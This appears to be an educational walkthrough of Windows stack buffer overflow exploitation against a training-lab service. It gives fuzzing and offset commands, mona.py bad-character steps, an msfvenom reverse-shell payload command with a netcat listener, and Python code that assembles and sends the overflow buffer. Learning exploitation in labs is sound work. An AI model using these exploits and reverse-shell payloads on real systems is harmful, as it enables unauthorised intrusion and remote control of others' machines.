Buffer Overflow

Download Python Script

I made a simple Python script to make exploiting buffer overflows simpler. Download the script here.

Fuzzing

Fuzzing sends progressively longer strings until the service stops responding. The length at which it crashes is only approximate, but it is the starting point for the next step.

python buff.py --fuzz -d 10.10.253.128 -p 1337
Example Output

Offset

The fuzzing step gives the approximate crash length. Now send a unique (cyclic) pattern that is about 400 bytes longer than that, so that the four bytes that land in EIP sit well inside the pattern. In this example the crash happened at roughly 700 bytes, so the pattern length is 1100.

python buff.py --offset -d 10.10.253.128 -p 1337 -l 1100
Example Output

Query Offset

Read the value of EIP from the debugger at the moment of the crash (here 76413176). Those four bytes are a slice of the cyclic pattern, so the command below looks them up in the pattern and returns the offset: the number of bytes that sit before the saved return address.

python buff.py --query -q 76413176 
Example Output
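To make the offset step concrete, here is an added example (not code from buff.py or from the original page) that generates a Metasploit-style cyclic pattern and looks up an EIP value in it. The EIP value 76413176 is the one shown on this page, and the lookup reproduces the offset of 634 used in the later commands; the reversal of the byte order is the little-endian conversion, since the debugger prints EIP as a number while the pattern bytes sit in memory lowest byte first.

```python
from string import ascii_uppercase, ascii_lowercase, digits

# Maximum unique pattern length: 26 uppercase * 26 lowercase * 10 digits * 3 bytes per chunk.
MAX_PATTERN = 26 * 26 * 10 * 3


def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the same order as msf-pattern_create: Aa0Aa1Aa2...Ab0Ab1...
    Every 4-byte window is unique as long as length <= MAX_PATTERN."""
    if length > MAX_PATTERN:
        raise ValueError(f"pattern longer than {MAX_PATTERN} bytes repeats")
    out = bytearray()
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip_hex: str) -> int:
    """Map the EIP value printed by the debugger (e.g. '76413176') to its offset in the pattern.
    EIP is shown as a big-endian number, but x86 stores it little-endian, so the bytes that
    were actually sent are the reversed byte sequence."""
    needle = bytes.fromhex(eip_hex)[::-1]          # 0x76413176 -> b"v1Av"
    idx = pattern.find(needle)
    if idx == -1:
        raise ValueError(f"{eip_hex} not found in pattern; was EIP overwritten by the pattern?")
    return idx


if __name__ == "__main__":
    pat = pattern_create(1100)                   # same length as the --offset command above
    print(pattern_offset(pat, "76413176"))       # offset used by the rest of this walkthrough
```

The pattern is searched for the reversed bytes, so if the lookup fails the most likely causes are an EIP that was not fully overwritten by the pattern (for example only two bytes) or a pattern longer than 20280 bytes, where 4-byte windows start to repeat.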

Send Bad Characters

The command below sends filler up to the offset, four B's where EIP is overwritten, and then every byte value from \x01 to \xff immediately after it. With the process still in the debugger, mona.py compares the bytes at ESP against the array it generated to find the ones that were mangled or dropped by the application.

python buff.py --chars -d 10.10.253.128 -p 1337 -o 634

After sending the payload, confirm that EIP reads 42424242 (four B's, 0x42 each). If it does not, the offset is wrong and nothing that follows will line up, so go back to the offset step.

Within Immunity Debugger, set mona's working folder (%p expands to the name of the debugged process, so each program gets its own directory):

!mona config -set workingfolder c:\mona\%p

Generate a bytearray that excludes the bytes already known to be bad. \x00 is excluded from the start because it terminates C strings and is almost always bad; on later rounds add every byte found so far. This writes bytearray.bin and bytearray.txt into the working folder:

!mona bytearray -b "\x00"

Compare the bytes in memory against the file. The -a argument is the address ESP points to at the crash, which is where the array starts; the directory name in the path comes from %p, so here the debugged process is oscp:

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

With the bad characters identified, search for a jmp esp whose address contains none of them by passing the list to -cpb:

!mona jmp -r esp -cpb "\x00........."

Example

!mona jmp -r esp -cpb "\x00\x07\x08\x2e\x2f\xa0\xa1"

Note: a bad character often corrupts the byte immediately after it, or truncates everything that follows, so mona can flag bytes that are not actually bad. Only the first byte of each run of flagged bytes is certain. If the command above returns zero results, drop the bytes that may only have been collateral damage and search again with the shortened list; regenerating the bytearray with that list and repeating the compare confirms it.

Original:

\x00\x07\x08\x2e\x2f\xa0\xa1

Modified:

\x00\x07\x2e\xa0

The result lists every jmp esp whose address contains none of the bad characters. Prefer an address in a module that mona lists without Rebase, ASLR, SafeSEH or DEP protections, so the address is the same on every run.

Pick one of the addresses. x86 is little-endian, so the four bytes of the address must be sent lowest byte first: 0x625011af goes onto the wire as \xaf\x11\x50\x62, which is the hex string af115062 that the script takes for its -r option.

Address:

0x625011af

Little-endian (the value passed to -r):

af115062

Run the following msfvenom command, replacing the -b value with the complete list of bad characters identified earlier (the example shows only \x00). The encoder will avoid those bytes in the output. EXITFUNC=thread terminates only the thread when the shell exits, so the service stays up and a failed attempt can be retried.

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c

Paste the generated C-style byte string into the payload variable of the payload function in buff.py.

Lastly, start a netcat listener on the LPORT chosen above (for example nc -nlvp 4444) and run the command below to get a reverse shell:

python buff.py --exploit -d 10.10.253.128 -p 1337 -o 634 -r 'af115062'
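The stages above (bad-character array, little-endian return address, final buffer layout) are shown here as an added example that is not buff.py and not code from the original page. It reuses the values from this walkthrough (offset 634, jmp esp at 0x625011af, the trimmed bad-character list) and assumes, as a labelled stand-in, that the vulnerable command takes no leading keyword and that the shellcode is a block of int3 instructions rather than real msfvenom output. The `first_mismatch` helper does locally what `!mona compare` does in the debugger, given a dump of the bytes at ESP.

```python
import socket
import struct

# Values from this page's walkthrough; PREFIX and the shellcode below are assumptions.
TARGET = ("10.10.253.128", 1337)
OFFSET = 634                      # result of the --query step
RET_ADDR = 0x625011af             # jmp esp found with !mona jmp -r esp -cpb ...
BADCHARS = b"\x00\x07\x2e\xa0"    # trimmed list from the note above
PREFIX = b""                      # assumption: no command keyword before the overflowing field


def gen_bytearray(excluded: bytes = b"\x00") -> bytes:
    """Same content as bytearray.bin from `!mona bytearray -b ...`: every byte value except the excluded ones."""
    return bytes(b for b in range(256) if b not in excluded)


def first_mismatch(expected: bytes, dumped: bytes):
    """What `!mona compare` reports: the first position where memory at ESP differs from what was sent.
    Returns (index, expected_byte, seen_byte); seen_byte is None if the dump was truncated there,
    and the result is None when the two match completely."""
    for i, (e, d) in enumerate(zip(expected, dumped)):
        if e != d:
            return (i, e, d)
    if len(dumped) < len(expected):
        return (len(dumped), expected[len(dumped)], None)
    return None


def pack_ret(addr: int) -> bytes:
    """Little-endian packing: 0x625011af becomes the bytes af 11 50 62 on the wire."""
    return struct.pack("<I", addr)


def check_badchars(data: bytes, badchars: bytes, what: str) -> None:
    """Refuse to build a payload that carries a known bad byte anywhere it matters."""
    hit = [b for b in badchars if b in data]
    if hit:
        raise ValueError(f"{what} contains bad characters: {[hex(b) for b in hit]}")


def build_exploit(offset: int, ret_addr: int, shellcode: bytes, badchars: bytes,
                  nop_sled: int = 16) -> bytes:
    """Layout: filler up to EIP | return address (jmp esp) | NOP sled | shellcode.
    jmp esp lands at the bytes right after the overwritten return address, which is the sled."""
    ret = pack_ret(ret_addr)
    check_badchars(ret, badchars, "return address")
    check_badchars(b"\x90", badchars, "NOP")
    check_badchars(shellcode, badchars, "shellcode")
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


def send_once(host: str, port: int, data: bytes, timeout: float = 3.0) -> None:
    """Deliver one payload; the fuzz, chars and exploit stages differ only in what `data` is."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(PREFIX + data + b"\r\n")


if __name__ == "__main__":
    # Constructed stand-in for msfvenom output: 0xcc is int3, so a hit shows up as a breakpoint in Immunity.
    shellcode = b"\xcc" * 32
    payload = build_exploit(OFFSET, RET_ADDR, shellcode, BADCHARS)
    send_once(*TARGET, payload)
```

The bad-character check on the return address is the reason the jmp esp search takes -cpb: an address such as 0x625011af is only usable because none of af, 11, 50 or 62 is in the list, and the same check applied to the shellcode catches a msfvenom run that was given an incomplete -b.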